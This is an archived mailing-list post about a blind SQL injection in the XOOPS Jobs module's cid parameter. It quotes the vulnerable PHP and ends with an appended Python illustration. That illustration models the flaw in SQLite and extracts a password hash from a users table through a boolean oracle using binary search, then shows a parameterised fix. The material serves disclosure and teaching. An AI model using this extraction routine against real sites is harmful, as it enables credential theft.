[VIM] true: XOOPS Module Jobs <= 2.4 (cid) SQL Injection Exploit
str0ke
str0ke at milw0rm.com
Thu Apr 5 21:13:07 UTC 2007
XOOPS Module Job Listings <= 2.1 (cid) Remote BLIND SQL Injection Exploit
http://www.milw0rm.com/exploits/3672
The correct name should be Jobs and the source code below is for the
latest version 2.4.
vendor url: http://www.jlmzone.com/
########### modules index.php ##############
// request parameters are taken straight from $_GET with no validation
$pa = isset( $_GET['pa'] ) ? $_GET['pa'] : '' ;
$lid = isset( $_GET['lid'] ) ? $_GET['lid'] : '' ;
$cid = isset( $_GET['cid'] ) ? $_GET['cid'] : '' ;
$debut = isset( $_GET['debut'] ) ? $_GET['debut'] : '' ;
switch($pa)
{
case "jobsview":
$xoopsOption['template_main'] = 'jobs_category.html';
include(XOOPS_ROOT_PATH."/header.php");
jobsview($cid, $debut);
break;
########### function jobsview #########
// $cid is concatenated into the query unquoted and uncast
$requete = $xoopsDB->query("select cid, pid, title from
".$xoopsDB->prefix("jobs_categories")." where cid=".$cid."");
list($ccid, $pid, $title) = $xoopsDB->fetchRow($requete);
$title = $myts->makeTboxData4Show($title);
$varid[$x]=$ccid;
$varnom[$x]=$title;
##################################
/str0ke
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xoopsjobexp.zip
Type: application/zip
Size: 1135 bytes
Desc: not available
Url : http://www.attrition.org/pipermail/vim/attachments/20070405/ac3dbd51/attachment.zip
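The following is an added illustration, not str0ke's exploit from the attachment and not XOOPS code. It models the jobsview() query above in Python with an in-memory SQLite table (the table contents, the second "users" table and the omitted table prefix are all constructed assumptions), shows why an unquoted, uncast cid gives a boolean oracle, extracts a string from another table through that oracle one character at a time, and contrasts it with the bound-parameter, integer-cast query the module should have used.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the module's tables; none of this data is from the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jobs_categories (cid INTEGER, pid INTEGER, title TEXT)")
    db.executemany(
        "INSERT INTO jobs_categories VALUES (?, ?, ?)",
        [(1, 0, "Engineering"), (2, 0, "Sales"), (3, 1, "Backend")],
    )
    # Hypothetical secondary table, present only to have something worth extracting
    db.execute("CREATE TABLE users (uid INTEGER, uname TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'd41d8cd98f00b204e9800998ecf8427e')")
    return db


def jobsview_vulnerable(db, cid):
    """Mirrors the module: 'where cid=' . $cid with no quoting or cast."""
    sql = "select cid, pid, title from jobs_categories where cid=" + str(cid)
    return db.execute(sql).fetchone()


def jobsview_fixed(db, cid):
    """Hardened form: cast to int (rejects anything non-numeric) and bind the value."""
    cid = int(cid)
    return db.execute(
        "select cid, pid, title from jobs_categories where cid=?", (cid,)
    ).fetchone()


def oracle(db, condition):
    """Boolean-based blind oracle: category 1 is rendered only when the injected
    condition is true, so 'row present' leaks one bit per request."""
    row = jobsview_vulnerable(db, "1 AND (" + condition + ")")
    return row is not None


def extract_string(db, subquery, max_len=64):
    """Recover the single-row string returned by `subquery` through the oracle.
    Each character is found by binary search over its code point (7 requests per
    character). substr() past the end yields '', whose unicode() is NULL, so every
    comparison is false and the search bottoms out at 0, which marks the end."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    print(jobsview_vulnerable(db, "1 AND 1=1"))   # row for cid 1
    print(jobsview_vulnerable(db, "1 AND 1=2"))   # None: the oracle flips
    print(extract_string(db, "select pass from users where uid=1"))
    print(jobsview_fixed(db, "1"))
```

The hardened query keeps the module's behaviour for legitimate numeric cid values; non-numeric input such as "1 AND 1=1" fails the int() cast instead of reaching the database, which is the same effect as XOOPS-style `(int)$cid` in PHP.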